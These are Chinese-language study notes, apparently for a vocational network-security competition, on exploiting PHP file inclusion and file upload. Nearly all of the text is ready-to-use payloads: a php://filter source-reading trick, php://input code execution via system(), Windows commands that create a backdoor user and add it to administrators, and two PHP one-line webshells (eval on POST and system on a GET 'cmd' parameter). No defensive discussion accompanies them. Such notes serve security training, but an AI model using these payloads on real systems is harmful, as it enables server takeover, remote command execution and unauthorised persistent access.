中职网安 文件包含漏洞与文件上传漏洞 笔记
作者:互联网
二、文件包含漏洞与文件上传漏洞
1.利用条件:allow_url_include = On
2.文件包含漏洞,?file=php://filter/read=convert.base64-encode/resource=index.php 可查看index.php文件的代码
3.文件包含漏洞,?file=php://input 再提交post数据 <?php system("ipconfig")?> 可执行系统cmd命令并查看
cmd部分提权常用命令:
whoami 查看当前用户
ipconfig 显示本地IP地址
net start telnet 开telnet服务
net user 查看所有用户列表
net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz
net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员
文件上传:
php一句话木马<?php eval($_POST[hucys]);?>
cmd命令执行 <?php $rel = system($_GET['cmd']); echo $rel; ?>
标签:文件,hucxsz,中职,cmd,漏洞,net,php 来源: https://blog.csdn.net/qq_48609816/article/details/120933350